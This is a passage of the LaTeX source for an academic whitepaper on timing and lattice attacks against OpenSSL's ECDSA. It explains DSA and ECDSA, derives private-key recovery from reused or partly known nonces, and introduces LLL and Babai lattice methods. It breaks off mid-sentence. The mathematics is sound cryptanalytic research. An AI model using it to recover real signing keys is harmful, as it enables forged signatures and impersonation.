https://raw.githubusercontent.com/mimoo/SSL-TLS-ECDSA-timing-attack/2663b8dd419de0505f791fe04292849b3b80eae8/whitepaper/serverside_scrambled.png -------------------------------------------------------------------------------- /whitepaper/whitepaper.tex: -------------------------------------------------------------------------------- 1 | \documentclass[a4paper,11pt]{article} 2 | 3 | % fonts 4 | \usepackage[utf8]{inputenc} 5 | %\usepackage[francais]{babel} 6 | 7 | % to get hyphenation on accented words 8 | \usepackage[T1]{fontenc} 9 | 10 | % href 11 | \usepackage{hyperref} 12 | \hypersetup{ 13 | colorlinks=true, 14 | linkcolor=blue, 15 | filecolor=blue, 16 | urlcolor=blue, 17 | bookmarks=true 18 | } 19 | 20 | % code highlighting 21 | \usepackage{minted} 22 | \usemintedstyle{pastie} 23 | 24 | % asm 25 | \usepackage{amsmath} 26 | \usepackage{amssymb} 27 | \usepackage{amsthm} 28 | 29 | % inline code 30 | \usepackage{listings} 31 | \usepackage{xcolor} 32 | 33 | % tables 34 | \usepackage{booktabs} 35 | 36 | % algorithm 37 | \usepackage[]{algorithm2e} 38 | 39 | % for right cases 40 | \newenvironment{rcases} 41 | {\left.\begin{aligned}} 42 | {\end{aligned}\right\rbrace} 43 | 44 | % images 45 | \usepackage{graphicx} 46 | \usepackage{float} 47 | 48 | % diagrams 49 | \usepackage{tikz} 50 | \usetikzlibrary{matrix} 51 | \usetikzlibrary{positioning} 52 | 53 | % tables 54 | \usepackage{booktabs} 55 | 56 | % no identation 57 | \setlength{\parindent}{0pt} 58 | 59 | % theorem 60 | \newtheorem{definition}{Definition} 61 | \newtheorem{property}{Property} 62 | \newtheorem{theorem}{Theorem} 63 | 64 | % header 65 | \title{Timing and Lattice Attacks on a Remote ECDSA OpenSSL Server: How Practical Are They Really?} 66 | \author{David Wong} 67 | \date{\emph{University of Bordeaux and NCC Group}, \small{September 2015}} 68 | 69 | % 70 | \begin{document} 71 | 72 | \maketitle 73 | 74 | \renewcommand{\abstractname}{Abstract} 75 | \begin{abstract} 76 | In 2011, B.B.Brumley and N.Tuveri found a remote timing attack on OpenSSL's ECDSA implementation for binary curves. We will study if the title of their paper was indeed relevant (Remote Timing Attacks are Still Practical). We improved on their lattice attack using the Embedding Strategy that reduces the Closest Vector Problem to the Shortest Vector Problem so as to avoid using Babai's procedures to solve the CVP and rely on the better experimental results of LLL. We will detail (along with publishing the source code of the tools we used) our attempts to reproduce their experiments from a remote machine located on the same network with the server, and see that such attacks are not trivial and far from being practical. Finally we will see other attacks and countermeasures.\\ 77 | \\ 78 | \textbf{Keywords:} DSA, ECDSA, Timing Attacks, Remote Side-Channel Attacks, OpenSSL, Howgrave-Graham and Smart, B.B.Brumley and N.Tuveri, Hidden Number Problem, Lattices, SVP, CVP, Babai, LLL, BKZ, Embedding Strategy, Short Nonces.\\ 79 | 80 | \end{abstract} 81 | 82 | \section{Introduction}\label{introduction} 83 | 84 | Randomness is an intrinsic part of any cryptosystem. It is the source we draw from to generate the secret keys of our Block Ciphers, it is the birthplace of the long keystreams engendered by our Stream Ciphers, the insurance of our Message Authentication Codes and ground zero for our Signatures. Being able to predict the origin of randomness of a cryptosystem will usually break the entirety of it. Using a bad Random Number Generator (\textbf{RNG}) is often the cause of many troubles, this is why nowadays we use the better \textbf{CSPRNGs} (Cryptographically Secure Pseudo Random Number Generators) that enable us to generate random numbers that are not predictable nor reveal any information about the previous random numbers generated (Forward Secrecy). One way of breaking these might be to use a backdoor, like Dual EC\cite{dualec} does, or to leak them through other channels. 85 | 86 | In this paper we will show how these ``Side-Channels'' can sometimes provide enough information to break a cryptosystem. In particular, how the knowledge of a few bits of dozens of nonces revealed by a timing attack can break DSA and ECDSA in applications like OpenSSL. In section 2 we will introduce Cryptographic Signatures with brief explanations on DSA and its Elliptic Curve variant ECDSA. In section 3 we will talk a bit about lattices and the interesting problems they carry, along with the tools past research has invented to solve them (or rather approximate them). In section 4 we will see how Howgrave-Graham and Smart attacked DSA with algorithms based on lattices. We will explain in details a special case of their attack: when the nonces are short, and will talk about improvements by using the Embedding Strategy. In section 5 we will start talking about a timing attack found by B.B.Brumley and N.Tuveri that recovers an OpenSSL server's private key by obtaining some information about the length of the nonces of its ECDSA signatures. We will follow by showing how to mount the attack and see how practical it really is according to our own experiments. In section 6 we will talk about related attacks and known counter-measures. Finally we will end the paper with a short conclusion in section 7. In appendix A you will find the C code of the timing part of the attack, in appendix B you will find the Sage code of the lattice part of the attack. Both can be found up to date on \href{https://github.com/mimoo/timing_attack_ecdsa_tls}{the public repository associated to this paper}. 87 | 88 | \section{Cryptographic Signatures}\label{rsa} 89 | 90 | 91 | One of the greatest tools cryptography has provided us in the modern era is the ability to digitally sign things. Like a real signature is ``supposed'' to attest you wrote that check, a digital signature over a digital object can attest it came from you. Actually a digital signature does much more: it \textbf{authenticate} the object (it came from you), it provides \textbf{integrity} (it has not been modified) and also \textbf{non-repudiation} (you cannot lie afterward about not having signed anything!). 92 | 93 | \subsection{DSA}\label{dsa} 94 | 95 | The Digital Signature Algorithm, commonly referred as DSA or even DSS (the same way Rijandel is referred to as AES), is one of the most used signature algorithms in the world. It is a variant of Schnorr's Signature\cite{schnorr} published by the NSA to circumvent the first one's patents. Based on Non-Interactive Zero-Knowledge Protocols and Public-Key Cryptography, it is pretty simple to state. You own two keys: a public key and a private key. You sign with your private key and people can verify your signature thanks to your public key which is... public. 96 | 97 | \begin{align*} 98 | &x \text{ the private key} \\ 99 | &(p, q, g, y) \text{ the public key with } y = g^x \pmod{p} 100 | \end{align*} 101 | 102 | We will not go into the details of how to generate a pair of private and public key. A signature over a message consists of two integers $r$ and $s$ that you can compute with a hash of the message, your private key, the public key and an \textbf{ephemeral private key} $k$. 103 | 104 | \begin{align*} 105 | &r = (g^k \pmod{p}) \pmod{q}\\ 106 | &s = k^{-1} ( H(m) + x r ) \pmod{q} 107 | \end{align*} 108 | 109 | Every time you want to sign something you must generate a new ephemeral private key $k$ in addition to your long term private key $x$. This is why we also call it a nonce as it is a \textbf{n}umber that has to be used only \textbf{once}. 110 | 111 | The verification part is pretty straight forward: take the elements from the signature and from the public key and compute: 112 | 113 | $$ (g^{H(m) (s^{-1} \pmod{q})} \cdot g^{r (s^{-1} \pmod{q}) \pmod{q}} \pmod{p}) \pmod{q} $$ 114 | 115 | Check if it's equal to $r$. If so, the signature is valid. 116 | 117 | \subsection{ECDSA}\label{ecdsa} 118 | 119 | ECDSA, a more modern variant of DSA based on \textbf{Elliptic Curves}, was invented in 1992 by Scott Vanstone in response to NIST's Request For Comment on their DSA\cite{ecdsa}. It carries better security assumptions and is more efficient than DSA due to smaller key sizes. It has been slowly replacing it over the years. 120 | 121 | DSA is based on the \textbf{Discrete Logarithm Problem} (DLP) in prime-order subgroups of $\mathbb{Z}^{\ast}_p$. The fact that given $y = g^x \pmod{p}$ with $g$ an element of the multiplicative group $\mathbb{Z}_{p}^{\ast}$ ($p$ prime), it is \emph{hard} to compute the integer $x$. This problem can be found in other kinds of groups like the one we define with Elliptic Curves, it is then called the \textbf{Elliptic Curve Discrete Logarithm Problem} or ECDLP in some of the fields.\\ 122 | 123 | Elliptic Curves are just some kind of curves usually defined as the points satisfying the \textbf{Weiestraß' equation}: 124 | 125 | $$ y^2 + a_1xy + a_3y = x^3 + a_2x^2 + a_4x + a_6 $$ 126 | \newpage 127 | Although in our case, ECDSA only works on Weierstrass curves, which are a particular subset of elliptic curves that can be written with the \textbf{short Weiestraß' equation}: 128 | 129 | $$ y^2 = x^3 - 3x + b $$ 130 | 131 | That set of points over a field $K$ along with a point $\mathcal{O}$ serving as the identity and called the \textit{point at infinity} forms an abelian group called \textbf{the elliptic curve group}. This group has two operations, addition and multiplication, which are defined following a \textit{chord-and-tangent rule}. The multiplication of a scalar $k$ with a point $P$ from the curve is usually written as $Q = [k]P$. The ECDLP is stated as follow: it is computationally hard to compute $k$ if you only know $Q$ and $P$ in the above equation (and if they are big enough).\\ 132 | 133 | The main advantage of ECDLP over DLP is that the most efficients attack on DLP (\textit{Index Calculus} attacks like the \textbf{General Number Field Sieve}) do not work for ECDLP. Keys in Elliptic Curve based algorithms are also much smaller than their counterparts based on conventional the Discrete Logarithm Problem, which allows for faster calculations and smaller certificates for equivalent levels of security\cite{vanstone}. 134 | 135 | ECDSA carries the same principles as DSA. The public key comprises all the public parameters of the curve of our choice and a public key $Q = [x]P$ which is a random multiple $x$ of the base point $P$ where $x$ is also the private key. 136 | 137 | \begin{align*} 138 | &r = ([k]P)_x \pmod{q}\\ 139 | &s = k^{-1} ( H(m) + x r ) \pmod{q} 140 | \end{align*} 141 | 142 | Pay attention to the scalar multiplication in the first part $r$ of the signature. This is the part that we will later talk about. 143 | 144 | \subsection{Security of DSA/ECDSA}\label{security_dsa_ecdsa} 145 | 146 | The security of DSA and ECDSA are often grossly reduced to the Discrete Logarithm Problem, while it should be tied to every information contained in its equations. 147 | 148 | Taking a look at the public part $(r, s)$ of an ECDSA signature: 149 | \begin{align*} 150 | &r = [k] P\\ 151 | &s = k^{-1} ( H(m) + x r ) \pmod{q} 152 | \end{align*} 153 | \newpage 154 | You can see in the second equation that knowing the nonce $k$ allows you to easily recover the private key $x$ (total break): 155 | 156 | $$ 157 | x = [ s k - H(m) ] \cdot r^{-1} \pmod{q} 158 | $$ 159 | 160 | An example of a misunderstanding of this concept is the PS3 nonce \textbf{re-use} in 2010\cite{ps3} where a team of researcher reversed the nonce generation part of the PS3 signing algorithm to realize that it was not totally random. 161 | 162 | \begin{figure}[H] 163 | \includegraphics[width=\textwidth]{ps3.png} 164 | \caption{The relevant slide from the \href{https://events.ccc.de/congress/2010/Fahrplan/attachments/1780_27c3_console_hacking_2010.pdf}{Chaos Communication Congress talk revealing the vulnerability}} 165 | \end{figure} 166 | 167 | You can see that reusing the same nonce only twice already leads to a break of the key: 168 | 169 | \begin{align*} 170 | &\begin{cases} 171 | s_1 = k^{-1} ( H(m_1) + x r ) \pmod{q}\\ 172 | s_2 = k^{-1} ( H(m_2) + x r ) \pmod{q} 173 | \end{cases}\\ 174 | \implies& s_1 - s_2 = k^{-1} ( H(m_1) - H(m_2) ) \pmod{q}\\ 175 | \implies& k = (H(m_1) - H(m_2)) (s_1 - s_2)^{-1} \pmod{q} 176 | \end{align*} 177 | 178 | Nonces being uniformly generated from huge sets make the probability of generating the same nonce twice \textbf{mathematically negligible}. But we will see that we need less information than that. Some subtle information on the nonces, like their \textbf{binary size}, can rapidly lead to the same total break. 179 | 180 | \section{Lattices} 181 | 182 | The attacks we will describe later both make use of lattices and the tools they carry. Hence it is necessary for us to understand what is a lattice and what algorithms based on lattices will be useful for us.\\ 183 | Think about Lattices like \textbf{Vector Spaces}. Imagine a simple vector space of two vectors. You can add them together, multiply them by scalars (let's say numbers of $\mathbb{R}$) and it spans a vector space.\\ 184 | 185 | \begin{tikzpicture}[scale=.55] 186 | \draw [lightgray] [<->] (0,5) -- (10,5); 187 | \draw [lightgray] [<->] (5,10) -- (5,0); 188 | \draw [thick,purple] [->] (5,5) -- (6, 8); 189 | \draw [thick,purple] [->] (5,5) -- (6, 6); 190 | 191 | \draw [thick,black] [->] (11,5) -- (12,5); 192 | 193 | %\path [fill=purple] (18,5) to (20.5,10) to (23,10) to (18,5); 194 | \path [fill=purple] (13,0) to (23,0) to (23,10) to (13,10); 195 | \draw [white,thick] [<->] (13,5) -- (23,5); 196 | \draw [white,thick] [<->] (18,10) -- (18,0); 197 | \end{tikzpicture}\\ 198 | 199 | Now imagine that our vector space's \textbf{scalars are the integers}, taken in $\mathbb{Z}$. The space spanned by the vectors is now made out of points. It's \textbf{discrete}. Meaning that for any point of this lattice there exists a ball centered around that point of radius different from zero that contains only that point. Nothing else.\\ 200 | 201 | \begin{figure}[H] 202 | \centering 203 | \begin{tikzpicture}[scale=.5] 204 | \draw [lightgray] [<->] (0,5) -- (10,5); 205 | \draw [lightgray] [<->] (5,10) -- (5,0); 206 | 207 | \draw [fill,purple] (9,1) circle [radius=0.1]; 208 | 209 | \draw [fill,purple] (7,1) circle [radius=0.1]; 210 | \draw [fill,purple] (8,2) circle [radius=0.1]; 211 | \draw [fill,purple] (9,3) circle [radius=0.1]; 212 | 213 | \draw [fill,purple] (5,1) circle [radius=0.1]; 214 | \draw [fill,purple] (6,2) circle [radius=0.1]; 215 | \draw [fill,purple] (7,3) circle [radius=0.1]; 216 | \draw [fill,purple] (8,4) circle [radius=0.1]; 217 | \draw [fill,purple] (9,5) circle [radius=0.1]; 218 | 219 | \draw [fill,purple] (3,1) circle [radius=0.1]; 220 | \draw [fill,purple] (4,2) circle [radius=0.1]; 221 | \draw [fill,purple] (5,3) circle [radius=0.1]; 222 | \draw [fill,purple] (6,4) circle [radius=0.1]; 223 | \draw [fill,purple] (7,5) circle [radius=0.1]; 224 | \draw [fill,purple] (8,6) circle [radius=0.1]; 225 | \draw [fill,purple] (9,7) circle [radius=0.1]; 226 | 227 | \draw [fill,purple] (1,1) circle [radius=0.1]; 228 | \draw [fill,purple] (2,2) circle [radius=0.1]; 229 | \draw [fill,purple] (3,3) circle [radius=0.1]; 230 | \draw [fill,purple] (4,4) circle [radius=0.1]; 231 | \draw [fill,purple] (5,5) circle [radius=0.1]; 232 | \draw [fill,purple] (6,6) circle [radius=0.1]; 233 | \draw [fill,purple] (7,7) circle [radius=0.1]; 234 | \draw [fill,purple] (8,8) circle [radius=0.1]; 235 | \draw [fill,purple] (9,9) circle [radius=0.1]; 236 | 237 | \draw [fill,purple] (1,3) circle [radius=0.1]; 238 | \draw [fill,purple] (2,4) circle [radius=0.1]; 239 | \draw [fill,purple] (3,5) circle [radius=0.1]; 240 | \draw [fill,purple] (4,6) circle [radius=0.1]; 241 | \draw [fill,purple] (5,7) circle [radius=0.1]; 242 | \draw [fill,purple] (6,8) circle [radius=0.1]; 243 | \draw [fill,purple] (7,9) circle [radius=0.1]; 244 | 245 | \draw [fill,purple] (1,5) circle [radius=0.1]; 246 | \draw [fill,purple] (2,6) circle [radius=0.1]; 247 | \draw [fill,purple] (3,7) circle [radius=0.1]; 248 | \draw [fill,purple] (4,8) circle [radius=0.1]; 249 | \draw [fill,purple] (5,9) circle [radius=0.1]; 250 | 251 | \draw [fill,purple] (1,7) circle [radius=0.1]; 252 | \draw [fill,purple] (2,8) circle [radius=0.1]; 253 | \draw [fill,purple] (3,9) circle [radius=0.1]; 254 | 255 | \draw [fill,purple] (1,9) circle [radius=0.1]; 256 | \end{tikzpicture} 257 | \end{figure} 258 | 259 | Lattice are interesting in cryptography because we seldom deal with real numbers and they bring us a lot of tools to deal with integers. 260 | 261 | Just as vector spaces, lattices can also be described by different baseis represented as \textbf{matrices}. 262 | 263 | Lattices come with their sets of hard problems, and in our interest their respective approximation-to-a-solution tools. 264 | 265 | \subsection{Shortest Vector Problem} 266 | 267 | One of the most famous lattice problems thought to be hard is the \textbf{SVP} or Shortest Vector Problem. It states that given a lattice basis, you have to find the shortest non-zero vector in the lattice. 268 | 269 | \begin{figure}[H] 270 | \centering 271 | \begin{tikzpicture}[scale=1] 272 | 273 | 274 | \begin{scope}[scale=.55,local bounding box=scope1] 275 | \coordinate (Origin) at (0,0); 276 | \coordinate (XAxisMin) at (-5,0); 277 | \coordinate (XAxisMax) at (5,0); 278 | \coordinate (YAxisMin) at (0,-5); 279 | \coordinate (YAxisMax) at (0,5); 280 | \draw [thin, black!40, <->] (XAxisMin) -- (XAxisMax);% Draw x axis 281 | \draw [thin, black!40,<->] (YAxisMin) -- (YAxisMax);% Draw y axis 282 | %\draw[style=help lines,dashed,black!20] (-5,-5) grid[step=1cm] (5,5); 283 | 284 | 285 | \begin{scope} 286 | \clip (-5,-5) rectangle (5,5); % Clips the picture... 287 | \pgftransformcm{1}{0.6}{0.7}{1}{\pgfpoint{0cm}{0cm}} 288 | 289 | % setup the nodes 290 | \foreach \x in {-15,...,15} 291 | \foreach \y in {-15,...,15} 292 | { 293 | \node[shape=circle,fill=black!45,scale=0.35] (\x-\y) at (2*\x,\y+3){}; 294 | } 295 | \end{scope} 296 | 297 | 298 | \end{scope} 299 | 300 | \begin{scope}[scale=.55,shift={(12,0)}] 301 | \coordinate (Origin) at (0,0); 302 | \coordinate (XAxisMin) at (-5,0); 303 | \coordinate (XAxisMax) at (5,0); 304 | \coordinate (YAxisMin) at (0,-5); 305 | \coordinate (YAxisMax) at (0,5); 306 | \draw [thin, black!40, <->] (XAxisMin) -- (XAxisMax);% Draw x axis 307 | \draw [thin, black!40,<->] (YAxisMin) -- (YAxisMax);% Draw y axis 308 | \draw [thin, purple,->] (0,0) -- (-.5,.7); 309 | %\draw[style=help lines,dashed,black!20] (-5,-5) grid[step=1cm] (5,5); 310 | 311 | 312 | \begin{scope} 313 | \clip (-5,-5) rectangle (5,5); % Clips the picture... 314 | \pgftransformcm{1}{0.6}{0.7}{1}{\pgfpoint{0cm}{0cm}} 315 | 316 | % setup the nodes 317 | \foreach \x in {-15,...,15} 318 | \foreach \y in {-15,...,15} 319 | { 320 | \node[shape=circle,fill=black!45,scale=0.35] (\x-\y) at (2*\x,\y+3){}; 321 | } 322 | \end{scope} 323 | 324 | % our little node 325 | \node[shape=circle,fill=purple,scale=0.35] at (-.6,.8){}; 326 | 327 | \end{scope} 328 | 329 | \end{tikzpicture} 330 | \caption{To solve the SVP problem find the shortest lattice vector in that lattice} 331 | \end{figure} 332 | 333 | This problem might seem obvious in the example, but lattice basis are rarely optimal and in more dimensions and/or with a bigger basis it quickly becomes problematic to solve the SVP. 334 | 335 | \subsection{Closest Vector Problem} 336 | 337 | Another interesting problem in lattices is the \textbf{CVP} or Closest Vector Problem, where given a lattice basis and a non-lattice vector you have to find the closest lattice vector to it. 338 | 339 | \begin{figure}[H] 340 | \centering 341 | \begin{tikzpicture}[scale=1] 342 | 343 | 344 | \begin{scope}[scale=.55,local bounding box=scope1] 345 | \coordinate (Origin) at (0,0); 346 | \coordinate (XAxisMin) at (-5,0); 347 | \coordinate (XAxisMax) at (5,0); 348 | \coordinate (YAxisMin) at (0,-5); 349 | \coordinate (YAxisMax) at (0,5); 350 | \draw [thin, black!40, <->] (XAxisMin) -- (XAxisMax);% Draw x axis 351 | \draw [thin, black!40,<->] (YAxisMin) -- (YAxisMax);% Draw y axis 352 | %\draw[style=help lines,dashed,black!20] (-5,-5) grid[step=1cm] (5,5); 353 | 354 | 355 | \begin{scope} 356 | \clip (-5,-5) rectangle (5,5); % Clips the picture... 357 | \pgftransformcm{1}{0.6}{0.7}{1}{\pgfpoint{0cm}{0cm}} 358 | 359 | % setup the nodes 360 | \foreach \x in {-15,...,15} 361 | \foreach \y in {-15,...,15} 362 | { 363 | \node[shape=circle,fill=black!45,scale=0.35] (\x-\y) at (2*\x,\y+3){}; 364 | } 365 | \end{scope} 366 | 367 | % our little node 368 | \node[shape=circle,fill=purple,scale=0.4] at (2.5,3.4){}; 369 | \node[shape=circle,draw=purple,fill=none,scale=0.8] at (2.5,3.4){}; 370 | 371 | 372 | \end{scope} 373 | 374 | \begin{scope}[scale=.55,shift={(12,0)}] 375 | \coordinate (Origin) at (0,0); 376 | \coordinate (XAxisMin) at (-5,0); 377 | \coordinate (XAxisMax) at (5,0); 378 | \coordinate (YAxisMin) at (0,-5); 379 | \coordinate (YAxisMax) at (0,5); 380 | \draw [thin, black!40, <->] (XAxisMin) -- (XAxisMax);% Draw x axis 381 | \draw [thin, black!40,<->] (YAxisMin) -- (YAxisMax);% Draw y axis 382 | %\draw[style=help lines,dashed,black!20] (-5,-5) grid[step=1cm] (5,5); 383 | 384 | 385 | \begin{scope} 386 | \clip (-5,-5) rectangle (5,5); % Clips the picture... 387 | \pgftransformcm{1}{0.6}{0.7}{1}{\pgfpoint{0cm}{0cm}} 388 | 389 | % setup the nodes 390 | \foreach \x in {-15,...,15} 391 | \foreach \y in {-15,...,15} 392 | { 393 | \node[shape=circle,fill=black!45,scale=0.35] (\x-\y) at (2*\x,\y+3){}; 394 | } 395 | \end{scope} 396 | 397 | % our little node 398 | \node[shape=circle,fill=purple!60,scale=0.4] at (2.5,3.4){}; 399 | \node[shape=circle,fill=purple,scale=0.4] at (2.1,3){}; 400 | \node[shape=circle,fill=none,draw=purple,scale=0.8] at (2.1,3){}; 401 | 402 | \end{scope} 403 | 404 | \end{tikzpicture} 405 | \caption{To solve the CVP problem you need to find the closest lattice vector to that non-lattice purple vector} 406 | \end{figure} 407 | 408 | Interestingly, The CVP is a generalization of the SVP. The reduction is pretty easy, although not obvious since asking for the closest lattice vector to $0$ would be $0$. This will be left as an exercise for the reader. 409 | 410 | \subsection{LLL} 411 | 412 | 413 | The \textbf{Lenstra–Lenstra–Lovász} \textit{lattice basis reduction algorithm} is a step by step calculus that reduces a lattice basis in polynomial time. The lattice is left unchanged but the row vectors of its new basis are ``\textbf{smaller}'' and nearly orthogonal to one another. Here's the real definitions: 414 | 415 | \begin{definition} 416 | Let $L$ be a lattice with a basis $B$. The $\delta$-LLL algorithm applied on $L$'s basis $B$ produces a new basis of $L$: $B' = \{b_1,\hdots,b_n\}$ satisfying: 417 | \begin{eqnarray} 418 | \forall \hspace{1mm} 1 \leq j < i \leq n \text{ we have } |\mu_{i,j}| \leq \frac{_1}{^2}\\ 419 | \forall \hspace{1mm} 1 \leq i < n \text{ we have } \delta \cdot \|\tilde{b_i}\|^2 \leq \| \mu_{i+1,i}\cdot \tilde{b}_i + \tilde{b}_{i + 1}\|^2 420 | \end{eqnarray} 421 | \begin{center} 422 | with $\mu_{i,j} = \frac{b_i \cdot \tilde{b}_j}{\tilde{b}_j \cdot \tilde{b}_j}$ and $\tilde{b}_1 = b_1$ (Gram-Schmidt) 423 | \end{center} 424 | \end{definition} 425 | 426 | \begin{tikzpicture}[scale=.55] 427 | \node [above] at (5,10) {\textbf{random basis}}; 428 | \node [above] at (18,10) {\textbf{reduced basis}}; 429 | \draw [lightgray] [<->] (0,5) -- (10,5); 430 | \draw [lightgray] [<->] (5,10) -- (5,0); 431 | 432 | \draw [fill,purple,opacity=.4] (9,1) circle [radius=0.1]; 433 | 434 | \draw [fill,purple,opacity=.4] (7,1) circle [radius=0.1]; 435 | \draw [fill,purple,opacity=.4] (8,2) circle [radius=0.1]; 436 | \draw [fill,purple,opacity=.4] (9,3) circle [radius=0.1]; 437 | 438 | \draw [fill,purple,opacity=.4] (5,1) circle [radius=0.1]; 439 | \draw [fill,purple,opacity=.4] (6,2) circle [radius=0.1]; 440 | \draw [fill,purple,opacity=.4] (7,3) circle [radius=0.1]; 441 | \draw [fill,purple,opacity=.4] (8,4) circle [radius=0.1]; 442 | \draw [fill,purple,opacity=.4] (9,5) circle [radius=0.1]; 443 | 444 | \draw [fill,purple,opacity=.4] (3,1) circle [radius=0.1]; 445 | \draw [fill,purple,opacity=.4] (4,2) circle [radius=0.1]; 446 | \draw [fill,purple,opacity=.4] (5,3) circle [radius=0.1]; 447 | \draw [fill,purple,opacity=.4] (6,4) circle [radius=0.1]; 448 | \draw [fill,purple,opacity=.4] (7,5) circle [radius=0.1]; 449 | \draw [fill,purple,opacity=.4] (8,6) circle [radius=0.1]; 450 | \draw [fill,purple,opacity=.4] (9,7) circle [radius=0.1]; 451 | 452 | \draw [fill,purple,opacity=.4] (1,1) circle [radius=0.1]; 453 | \draw [fill,purple,opacity=.4] (2,2) circle [radius=0.1]; 454 | \draw [fill,purple,opacity=.4] (3,3) circle [radius=0.1]; 455 | \draw [fill,purple,opacity=.4] (4,4) circle [radius=0.1]; 456 | \draw [fill,purple,opacity=.4] (5,5) circle [radius=0.1]; 457 | \draw [fill,purple,opacity=.4] (6,6) circle [radius=0.1]; 458 | \draw [fill,purple,opacity=.4] (7,7) circle [radius=0.1]; 459 | \draw [fill,purple,opacity=.4] (8,8) circle [radius=0.1]; 460 | \draw [fill,purple,opacity=.4] (9,9) circle [radius=0.1]; 461 | 462 | \draw [fill,purple,opacity=.4] (1,3) circle [radius=0.1]; 463 | \draw [fill,purple,opacity=.4] (2,4) circle [radius=0.1]; 464 | \draw [fill,purple,opacity=.4] (3,5) circle [radius=0.1]; 465 | \draw [fill,purple,opacity=.4] (4,6) circle [radius=0.1]; 466 | \draw [fill,purple,opacity=.4] (5,7) circle [radius=0.1]; 467 | \draw [fill,purple,opacity=.4] (6,8) circle [radius=0.1]; 468 | \draw [fill,purple,opacity=.4] (7,9) circle [radius=0.1]; 469 | 470 | \draw [fill,purple,opacity=.4] (1,5) circle [radius=0.1]; 471 | \draw [fill,purple,opacity=.4] (2,6) circle [radius=0.1]; 472 | \draw [fill,purple,opacity=.4] (3,7) circle [radius=0.1]; 473 | \draw [fill,purple,opacity=.4] (4,8) circle [radius=0.1]; 474 | \draw [fill,purple,opacity=.4] (5,9) circle [radius=0.1]; 475 | 476 | \draw [fill,purple,opacity=.4] (1,7) circle [radius=0.1]; 477 | \draw [fill,purple,opacity=.4] (2,8) circle [radius=0.1]; 478 | \draw [fill,purple,opacity=.4] (3,9) circle [radius=0.1]; 479 | 480 | \draw [fill,purple,opacity=.4] (1,9) circle [radius=0.1]; 481 | 482 | % 483 | \draw [thick,black] [->] (11,5) -- (12,5); 484 | \node [above] at (11.5,5) {$_{LLL}$}; 485 | % 486 | 487 | \draw [lightgray] [<->] (13,5) -- (23,5); 488 | \draw [lightgray] [<->] (18,10) -- (18,0); 489 | 490 | \draw [fill,purple,opacity=.4] (22,1) circle [radius=0.1]; 491 | 492 | \draw [fill,purple,opacity=.4] (20,1) circle [radius=0.1]; 493 | \draw [fill,purple,opacity=.4] (21,2) circle [radius=0.1]; 494 | \draw [fill,purple,opacity=.4] (22,3) circle [radius=0.1]; 495 | 496 | \draw [fill,purple,opacity=.4] (18,1) circle [radius=0.1]; 497 | \draw [fill,purple,opacity=.4] (19,2) circle [radius=0.1]; 498 | \draw [fill,purple,opacity=.4] (20,3) circle [radius=0.1]; 499 | \draw [fill,purple,opacity=.4] (21,4) circle [radius=0.1]; 500 | \draw [fill,purple,opacity=.4] (22,5) circle [radius=0.1]; 501 | 502 | \draw [fill,purple,opacity=.4] (16,1) circle [radius=0.1]; 503 | \draw [fill,purple,opacity=.4] (17,2) circle [radius=0.1]; 504 | \draw [fill,purple,opacity=.4] (18,3) circle [radius=0.1]; 505 | \draw [fill,purple,opacity=.4] (19,4) circle [radius=0.1]; 506 | \draw [fill,purple,opacity=.4] (20,5) circle [radius=0.1]; 507 | \draw [fill,purple,opacity=.4] (21,6) circle [radius=0.1]; 508 | \draw [fill,purple,opacity=.4] (22,7) circle [radius=0.1]; 509 | 510 | \draw [fill,purple,opacity=.4] (14,1) circle [radius=0.1]; 511 | \draw [fill,purple,opacity=.4] (15,2) circle [radius=0.1]; 512 | \draw [fill,purple,opacity=.4] (16,3) circle [radius=0.1]; 513 | \draw [fill,purple,opacity=.4] (17,4) circle [radius=0.1]; 514 | \draw [fill,purple,opacity=.4] (18,5) circle [radius=0.1]; 515 | \draw [fill,purple,opacity=.4] (19,6) circle [radius=0.1]; 516 | \draw [fill,purple,opacity=.4] (20,7) circle [radius=0.1]; 517 | \draw [fill,purple,opacity=.4] (21,8) circle [radius=0.1]; 518 | \draw [fill,purple,opacity=.4] (22,9) circle [radius=0.1]; 519 | 520 | \draw [fill,purple,opacity=.4] (14,3) circle [radius=0.1]; 521 | \draw [fill,purple,opacity=.4] (15,4) circle [radius=0.1]; 522 | \draw [fill,purple,opacity=.4] (16,5) circle [radius=0.1]; 523 | \draw [fill,purple,opacity=.4] (17,6) circle [radius=0.1]; 524 | \draw [fill,purple,opacity=.4] (18,7) circle [radius=0.1]; 525 | \draw [fill,purple,opacity=.4] (19,8) circle [radius=0.1]; 526 | \draw [fill,purple,opacity=.4] (20,9) circle [radius=0.1]; 527 | 528 | \draw [fill,purple,opacity=.4] (14,5) circle [radius=0.1]; 529 | \draw [fill,purple,opacity=.4] (15,6) circle [radius=0.1]; 530 | \draw [fill,purple,opacity=.4] (16,7) circle [radius=0.1]; 531 | \draw [fill,purple,opacity=.4] (17,8) circle [radius=0.1]; 532 | \draw [fill,purple,opacity=.4] (18,9) circle [radius=0.1]; 533 | 534 | \draw [fill,purple,opacity=.4] (14,7) circle [radius=0.1]; 535 | \draw [fill,purple,opacity=.4] (15,8) circle [radius=0.1]; 536 | \draw [fill,purple,opacity=.4] (16,9) circle [radius=0.1]; 537 | 538 | \draw [fill,purple,opacity=.4] (14,9) circle [radius=0.1]; 539 | 540 | % vectors 541 | \draw [thick,purple] [->] (5,5) -- (7, 9); 542 | \draw [thick,purple] [->] (5,5) -- (6, 8); 543 | 544 | \draw [thick,purple] [->] (18,5) -- (19, 4); 545 | \draw [thick,purple] [->] (18,5) -- (19, 6); 546 | \end{tikzpicture}\\ 547 | 548 | We will not dig into the internals of LLL here, see Chris Peikert's course\cite{chrispeikert} for detailed explanations of the algorithm. 549 | 550 | \subsection{Babai} 551 | 552 | In 1986, Babai introduced two algorithms\cite{babai} to get an approximation of the Closest Vector Problem.\\ 553 | Let $L$ be a lattice in $\mathbb{R}^d$, given by a basis $B = {b_1, \hdots, b_d}$ and let $x \in \mathbb{R}^d$. Let $u$ be the nearest neighbor of $x$ in $L$. Babai's procedures bring a way to find an approximation $w$ of this vector $u$. 554 | 555 | \textbf{Rounding Off procedure:} Let $\displaystyle x = \sum^d_{i=1} \beta_i b_i$ and let $\alpha_i$ be the integer nearest to $\beta_i$. Set $\displaystyle w = \sum^d_{i=1} \alpha_i b_i$.\\ 556 | 557 | \textbf{Nearest Plane procedure:} Let $\displaystyle U = \sum^{d-1}_{i=1} R b_i$ be the linear subspace generated by $b_1, \hdots, b_{d-1}$ and let $\displaystyle L' = \sum^{d-1}_{i=1} Z b_i$ be the corresponding sublattice of $L$.\\ 558 | Find $v \in L$ such that the distance between $x$ and the affine subspace $U + v$ be 